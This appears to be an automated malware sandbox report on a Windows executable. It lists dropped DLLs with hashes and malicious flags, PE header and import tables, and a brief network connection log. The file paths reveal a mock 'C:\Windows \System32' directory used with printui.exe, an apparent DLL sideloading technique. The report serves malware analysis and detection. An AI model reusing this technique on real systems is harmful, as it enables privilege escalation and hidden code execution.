                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1851113
                                                                                            Entropy (8bit):6.295735352298234
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:SAlxpPnBAUZLY9OVbbTiZGavkg3NyeuQ6l9fH+f2ykqZrkgecviRd7mQFz:DPnBAUZLY9OEZGaXBuQQ9e2YYUQFz
                                                                                            MD5:158BC77453D382CF6679CE35DF740CC5
                                                                                            SHA1:9A3C123CE4B6F6592ED50D6614387D059BFB842F
                                                                                            SHA-256:CF131738F4B5FE3F42E9108E24595FC3E6573347D78E4E69EC42106C1EEBE42C
                                                                                            SHA-512:6EB1455537CB4E62E9432032372FAE9CE824A48346E00BAF38EF2F840E0ED3F55ACAEE2656DA656DB00AE0BDEF808F8DA291DD10D7453815152EDA0CCFC73147
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.Jd....q.....& ..."............P..........f............................................. .................................................D....@..........d............P..................................(.......................p............................text..............................`.P`.data...............................@.P..rdata..............................@.`@.pdata..d...........................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..D...........................@.0..CRT....X.... ......................@.@..tls.........0......................@.@..rsrc........@......................@.0..reloc.......P......................@.0B/4...... ....`......................@..B/19.....m....p... ..................@..B/31......2.......4..................@..B/45.....
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):475769
                                                                                            Entropy (8bit):5.442192544327632
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:YoSRYqB/kDraXbQTNRC6RsclS8DzT6Bam:+YY/kDraLQTNRCPWDzT6Bam
                                                                                            MD5:E79E7C9D547DDBEE5C8C1796BD092326
                                                                                            SHA1:8E50B296F4630F6173FC77D07EEA36433E62178A
                                                                                            SHA-256:1125AC8DC0C4F5C3ED4712E0D8AD29474099FCB55BB0E563A352CE9D03EF1D78
                                                                                            SHA-512:DBA65731B7ADA0AC90B4122C7B633CD8D9A54B92B2241170C6F09828554A0BC1B0F3EDF6289B6141D3441AB11AF90D6F8210A73F01964276D050E57FB94248E2
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......[.H........& .....D....................(h....................................0......... ......................................................@..8....................P..p........................... 0..(....................................................text...8C.......D..................`.P`.data........`.......J..............@.`..rdata..0M...p...N...L..............@.`@.pdata..............................@.0@.xdata..d...........................@.0@.bss....P.............................`..edata..............................@.0@.idata..............................@.0..CRT....X.... ......................@.@..tls....h....0......................@.`..rsrc...8....@......................@.0..reloc..p....P......................@.0B/4...........`......................@.PB/19..........p......................@..B/31.....1:.......<..................@..B/45.....
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):327168
                                                                                            Entropy (8bit):6.055910692008984
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:veJ/i9L1mle2NwGTQ46ZEEKN4zP2/SHzI4l/4OMx7apSPIYuh0L/iXmJ:gmV2NwQQ3G4zP22rOIy
                                                                                            MD5:EF060E5C414B7BE5875437FF2FB8EC54
                                                                                            SHA1:6DCF04DFF9B25BE556EC97660F95ACF708C0C870
                                                                                            SHA-256:E6ACED8D30471F35B37ABBF172CE357B6A8F18AF5FEB342B6CFFC01D3378F2B4
                                                                                            SHA-512:67BFF321BA901A0B0DC0F6C4A723D7DF35418F593E16E6193673CCE5190D76355409F676C1EA5D0CB46493F5735209089A3A52D3D716EB8187BF6E846792E2E8
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........t3R..`R..`R..`[..`D..`To.aP..`To.`T..`To.a_..`To.aZ..`To.aV..`...a^..`n..aU..`R..`K..`=o.ag..`=o.aS..`=o.`S..`R.`S..`=o.aS..`RichR..`........................PE..d.....:f.........." ...&.l...........e.......................................@............`...@...................................................... ..........,"...........0.......k..T...........................pj..@...............p............................text...xj.......l.................. ..`.rdata..vT.......V...p..............@..@.data...............................@....pdata..,".......$..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):818176
                                                                                            Entropy (8bit):6.269258421632734
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:NGbc08emtUas2F158w1T4qLgl85MNRlqnZ5ydEVB3i:NGoL9W0lJ5cR9dEVB3
                                                                                            MD5:69D0FEE0CC47C3B255C317F08CE8D274
                                                                                            SHA1:782BC8F64B47A9DCEDC95895154DCA60346F5DD7
                                                                                            SHA-256:BA979C2DBFB35D205D9D28D97D177F33D501D954C7187330F6893BB7D0858713
                                                                                            SHA-512:4955252C7220810ED2EACA002E57D25FBC17862F4878983C4351C917CF7873EB84AE00E5651583004F15A08789BE64BDB34FF20CB0E172C9C1376706DEB4AA1A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.'.c...O..s...O..|...O..y...O..u..:...u...L..r..q..*...L......L..p...LK.p...L..p..Richq..................PE..d...d.Lf.........." ...'..................................................................`..........................................0...K...{..................Hr..............\.......T...............................@............................................text...X........................... ..`.rdata..L...........................@..@.data...8=.......8..................@....pdata..Hr.......t..................@..@.rsrc................`..............@..@.reloc..\............d..............@..B........................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):52736
                                                                                            Entropy (8bit):5.840253326728635
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:fE20UsQSmxsJ/jPxsiFFnoCImovqcyz88rtYNChvThLaim3Yu/g/D8:cis0sP5FBQ7vU9BYshtaim3Yuo78
                                                                                            MD5:9DC829C2C8962347BC9ADF891C51AC05
                                                                                            SHA1:BF9251A7165BB2981E613AC5D9051F19EDB68463
                                                                                            SHA-256:FFE2D56375BB4E8BDEE9037DF6BEFC5016DDD8871D0D85027314DD5792F8FDC9
                                                                                            SHA-512:FD7E6F50A21CB59075DFA08C5E6275FD20723B01A23C3E24FB369F2D95A379B5AC6AE9F509AA42861D9C5114BE47CCE9FF886F0A03758BFDC3A2A9C4D75FAB56
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1786880
                                                                                            Entropy (8bit):6.056894707447503
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:JUV0C8E3W4JoceLErS6P0qoc6uoPrT5PgVBHmaw+zrGOzli7Gi0m9ZRXyYk:i8/B90ozghlGJ7js
                                                                                            MD5:C3130CFB00549A5A92DA60E7F79F5FC9
                                                                                            SHA1:56C2E8FB1AF609525B0F732BB67B806BDDAB3752
                                                                                            SHA-256:EEE42EABC546E5AA760F8DF7105FCF505ABFFCB9EC4BF54398436303E407A3F8
                                                                                            SHA-512:29BAB5B441484BDFAC9EC21CD4F0F7454AF05BFD7D77F7D4662AEAEAA0D3E25439D52AA341958E7896701546B4A607D3C7A32715386C78B746DFAE8529A70748
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):131920
                                                                                            Entropy (8bit):6.0574531251583865
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
                                                                                            MD5:F57FB935A9A76E151229F547C2204BBA
                                                                                            SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
                                                                                            SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
                                                                                            SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):304
                                                                                            Entropy (8bit):7.295206871811174
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:a1yMwCoeim3JV9R6DuYK6YyjhqdPrKPH7rFf/sIKsIuycKFiBU9kDGko:qiKv76DDN8dPr07rKIXIuyTN9kDGko
                                                                                            MD5:572F8A00881F751BD6CA0613D20E0EA8
                                                                                            SHA1:CD506507CDD36CE65EE65560997CA3D6E317AA20
                                                                                            SHA-256:DE1DDAD90B10E0A449B24BA76B32FBF504D2DB97CC4370A1AB8BC9602E8B5958
                                                                                            SHA-512:AF68CB7DB24395FBA801ECECC204764C8B9ADC868B780734C9CEA01D261EC034B57CE2AB1A1326661EB9FA2DC1AA8D00B7EB08E9D08571DD55D1344BA55F40A5
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):7417856
                                                                                            Entropy (8bit):7.999923823214666
                                                                                            Encrypted:true
                                                                                            SSDEEP:196608:T17lc7yNNvmrX2D367Dyw0b6sreztybRkUmwb6:Flg6+2L67D46s9bWA6
                                                                                            MD5:ADBF946B4222BA62BDAF420D19C6E998
                                                                                            SHA1:84E2DBB828D2927C8E1A3BBACEEA769404970442
                                                                                            SHA-256:756205904CF6AFFD5428390B25F88D94BEB150F69852CC2BB0F49EE3AEB7FBE1
                                                                                            SHA-512:AE30872DD6BCFBD866702AC8E23859BD94E1197DCCABDD5166F61CE20D694204572352C9B9270874D8BBC025E6F55171903995B0C884DC36C5C44114C8E8F59A
                                                                                            Malicious:true
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1940480
                                                                                            Entropy (8bit):6.556048550506196
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:8Eqf7bCPu5W7Ih0lhSMXlFnewf6oV9h0lhSMXln98GzsJP8GLC8h0lhSMXl8z917:8bffWuWRewfv0CP8NBMj
                                                                                            MD5:DD6B814D79B44D3A17EF1175C724F199
                                                                                            SHA1:4B50AD258D2D177F22ED06CE3494DEA67C180B22
                                                                                            SHA-256:ED6BF39B821CF5ECB2E73B6021913B9D6F0FC73A82EE9E9C8B64B2A0EB7E917C
                                                                                            SHA-512:60A92D0FE216ECCF001ABC9D90AB21D459C1442B999D3719129C17814BF529F19EDCB35469ED79691072747E0F57C4C417600B8A398BFC1131F42D324A5FDED2
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):90624
                                                                                            Entropy (8bit):6.509332615593886
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:Wc9wKxbEwda1CzUbFfbpVxyRyxpGTlKAbe6IOcIOZyyFz5o9X2153:7uKxbEwUEAhbprCOGTKISZyuVo9GT
                                                                                            MD5:F53D1EFEA4855DA42DA07DE49D80BA68
                                                                                            SHA1:920349F4BD5A5B8E77195C81E261DFA2177EB1EE
                                                                                            SHA-256:7E9F43688189578042D791E3E5301165316EDC7C1ED739E0669C033A3CA08037
                                                                                            SHA-512:5D72F64B8E5C42A3C9A7BCBBE8A1598A85402ADE4F312AB9E26869F8B39952A3AA037F2CF7DA89E686C5BC3FCB221FEEAE077B9FFD2EEF98DAC0E307637FE7BD
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                            Entropy (8bit):6.555556347881242
                                                                                            TrID:
                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:58VSNPxrI4.exe
                                                                                            File size:14'664'704 bytes
                                                                                            MD5:228c09c31156d45dfe94195bb34d1399
                                                                                            SHA1:20c6ce4757be1399032b2ac6873dc505c1d02839
                                                                                            SHA256:b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb
                                                                                            SHA512:003557ad24f826143a50cce81b56489c7768951ecdfef9b01fe645f5453ae8cf36bd1b2b6e5e3bd8d27131cf3a2d54d20b7c699ae582e2528b65aee8a560f40c
                                                                                            SSDEEP:393216:hPsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCyGTQP76NuudqfZnXSdEVB3:hITk1
                                                                                            TLSH:4DE68D5AB7A900A9E477C278C5975217F772B81103709BDB1BA496B91F33BD0EE3A700
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A1E..P+..P+..P+.w....P+.w./..P+.w.(..P+...(..P+.../..P+....._P+.w.*..P+..P*..P+..."..P+......P+...)..P+.Rich.P+.........PE..d..
                                                                                            Icon Hash:00928e8e8686b000
                                                                                            Entrypoint:0x140026658
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x140000000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x67654F5F [Fri Dec 20 11:05:03 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:6
                                                                                            OS Version Minor:0
                                                                                            File Version Major:6
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:6
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:670a8ec7c6d911c03a319eb0c0fda685
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xdf6d84         0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xe00000         0x1e8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0xdfb000         0x3990        .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xe01000         0xa84         .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xdef640         0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xdef500         0x140         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x42000          0x3a8         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x401c0 | 0x40200 | 7e7af9824a1ecaab91d08d883e6c58e1 | False | 0.5116578338206628 | data | 6.455695053837932 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x42000 | 0xdb5a0a | 0xdb5c00 | 599d0ef5af81139735ec1926aa267a43 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xdf8000 | 0x2ef0 | 0x1800 | 71489ac90d03a11ae4c0277ac0194539 | False | 0.18505859375 | DOS executable (block device driver) | 3.2411881026098075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xdfb000 | 0x3990 | 0x3a00 | e88e23efaca95868c109cbcc6abeec3d | False | 0.4774380387931034 | data | 5.631575537976179 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fptable | 0xdff000 | 0x100 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xe00000 | 0x1e8 | 0x200 | 023deb8c7350ae93fdd16d73de779d8e | False | 0.541015625 | data | 4.756146432197578 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe01000 | 0xa84 | 0xc00 | 13f75fec917993ceb253d090e12e5a2f | False | 0.4716796875 | data | 5.144439829458611 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xe00060 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
DLL | Import
WTSAPI32.dll | WTSQueryUserToken
KERNEL32.dll | GetSystemDirectoryW, OpenProcess, CreateToolhelp32Snapshot, Process32NextW, WaitForSingleObject, CloseHandle, WTSGetActiveConsoleSessionId, CreateProcessW, WriteConsoleW, GetModuleFileNameW, TerminateProcess, GetModuleHandleExW, SetEndOfFile, Process32FirstW, CreateDirectoryW, CreateFileW, FindClose, FindFirstFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, GetFileInformationByHandle, SetFileInformationByHandle, AreFileApisANSI, GetLastError, DeviceIoControl, GetModuleHandleW, GetProcAddress, CopyFileW, GetFileInformationByHandleEx, CreateSymbolicLinkW, MultiByteToWideChar, WideCharToMultiByte, LocalFree, FormatMessageA, GetLocaleInfoEx, QueryPerformanceCounter, QueryPerformanceFrequency, GetStringTypeW, Sleep, GetCurrentThreadId, CompareStringEx, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, RtlUnwind, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, ExitProcess, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, HeapReAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, VirtualProtect, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, HeapSize
ADVAPI32.dll | RegSetValueExW, RegOpenKeyExW, CreateProcessAsUserW, RegQueryValueExW, RegCloseKey
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                            Dec 20, 2024 16:21:19.784734011 CET49804443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:19.831326008 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:20.464659929 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:20.465090036 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:20.465146065 CET49804443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:20.465161085 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:20.465217113 CET49804443192.168.2.820.233.83.145
